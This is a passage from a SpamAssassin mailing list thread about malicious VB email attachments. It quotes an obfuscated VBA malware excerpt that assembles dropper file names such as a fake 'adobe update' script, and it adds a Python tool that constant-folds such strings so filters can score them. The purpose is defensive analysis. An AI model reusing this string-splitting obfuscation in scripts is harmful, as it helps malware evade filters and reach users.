Thank you all for your comments, very much appreciated
 
Tony
 
Date: Wed, 18 Feb 2015 12:28:11 -0700
From: ml-node+s1065346n114635...@n5.nabble.com
To: tiar...@hotmail.com
Subject: Re: Recent spate of Malicious VB attachments II



On Wed, 18 Feb 2015 14:16:02 -0500 Joe Quinn <[hidden email]> wrote:


> On 2/18/2015 2:10 PM, Reindl Harald wrote:
> > the source contains at least socket:// and heavy pulsating disk-IO
> > noticed from the RAID10 as long as the process was active - will give
> > it a try in an isolated VM to look what it does the next spare time
>
> Or if there was an SA-style classifier for malware that scores files
> in addition to "this is a keylogger".

A lot of the samples we see heavily obfuscate the VB code.  Example:


Sub h()
     ds = 99 + Sgn(98) + Sgn(902) + Sgn(-5)
     USER = Module1.Travel("username")

     jks = ds
     PST2 = "" + "" & "" & "a" + "do" & "be" & "ac" & "d-u" & "pd" & "a" & "te" & ""
     VBT2 = "" & "a" + Chr(100) + "o" & "b" & "ea" & "cd-up" & "da" & "te" & ""
     VBTXP2 = "" & "a" & Chr(100) & "o" & "be" + "ac" & "d-u" + "pd" + "atex" + "p" & ""
     BART2 = "" & "a" + Chr(100) & "o" & "b" & "e" + "ac" & "d-up" + "date" & ""

     PST1 = PST2 + "." + Chr(Asc("p")) + Chr(ds + 15) + "1" + ""
     VBT1 = VBT2 + "." + Chr(118) + "b" + Chr(Asc("s")) + ""
     VBTXP = VBTXP2 + "." + Chr(Asc("v")) + Chr(Asc("b")) + "s" + ""

... more of the same


This makes a simple-minded "strings" inadequate. :( I've also seen
highly-obfuscated Javascript code that builds up strings and then evaluates
them as Javascript.


Regards,


David.
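
The string building in the quoted sample can be undone statically, which is what a scoring classifier would need before it can match on file names. The following Python constant folder is an added example, not part of the original thread or of SpamAssassin; it covers only the `&`, `+`, `-`, `Chr`, `Asc` and `Sgn` subset seen in the sample, and `fold`, `fold_assignments` and `SAMPLE` are names assumed here.

```python
import re
from contextlib import suppress

# TOKEN: string, integer, dotted identifier or operator. FUNCS: built-ins in the sample.
TOKEN = re.compile(r'\s*(?:"(?P<str>(?:[^"]|"")*)"|(?P<num>\d+)|(?P<id>[A-Za-z_][\w.]*)|(?P<op>[&+\-()]))')
FUNCS = {"chr": chr, "asc": lambda s: ord(s[0]), "sgn": lambda n: (n > 0) - (n < 0)}

def fold(src, env):
    """Constant-fold one VB expression; raises if it needs anything not in env."""
    src = src.strip()
    found = list(TOKEN.finditer(src))
    if sum(len(m.group()) for m in found) != len(src):
        raise ValueError("unsupported syntax in %r" % src)
    toks = [(m.lastgroup, m.group(m.lastgroup)) for m in found]
    def term():
        kind, val = toks.pop(0)
        if kind == "str": return val.replace('""', '"')
        if kind == "num": return int(val)
        if (kind, val) == ("op", "-"): return -term()
        if kind == "id" and toks[:1] == [("op", "(")]:
            toks.pop(0); arg = expr()
            if toks.pop(0) != ("op", ")"): raise ValueError("expected ')'")
            return FUNCS[val.lower()](arg)       # KeyError for any other call
        return env[val.lower()]                  # KeyError if not folded yet
    def expr():                                  # flat, evaluated left to right
        left = term()
        while toks and toks[0][0] == "op" and toks[0][1] in "&+-":
            op, right = toks.pop(0)[1], term()
            if op == "&": left = str(left) + str(right)
            else: left = left + right if op == "+" else left - right
        return left
    value = expr()
    if toks: raise ValueError("trailing tokens in %r" % src)
    return value

def fold_assignments(lines):
    """Fold 'name = expr' lines in order, skipping any that do not resolve."""
    env = {}
    for name, sep, rhs in (line.partition("=") for line in lines):
        with suppress(KeyError, IndexError, TypeError, ValueError, OverflowError):
            if sep: env[name.strip().lower()] = fold(rhs, env)
    return env

# Assignments copied from the sample quoted above (wrapped line rejoined).
SAMPLE = '''ds = 99 + Sgn(98) + Sgn(902) + Sgn(-5)
USER = Module1.Travel("username")
PST2 = "" + "" & "" & "a" + "do" & "be" & "ac" & "d-u" & "pd" & "a" & "te" & ""
VBT2 = "" & "a" + Chr(100) + "o" & "b" & "ea" & "cd-up" & "da" & "te" & ""
PST1 = PST2 + "." + Chr(Asc("p")) + Chr(ds + 15) + "1" + ""
VBT1 = VBT2 + "." + Chr(118) + "b" + Chr(Asc("s")) + ""'''.splitlines()
```

Running `fold_assignments(SAMPLE)` recovers `adobeacd-update.ps1` and `adobeacd-update.vbs`, so content rules can be applied to the folded values rather than to the raw source; the `USER` line is left out because it depends on a call that cannot be resolved statically.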




        
        
        
        

        

        
        
                                                  



--
View this message in context: 
http://spamassassin.1065346.n5.nabble.com/Recent-spate-of-Malicious-VB-attachments-II-tp114621p114639.html
Sent from the SpamAssassin - Users mailing list archive at Nabble.com.
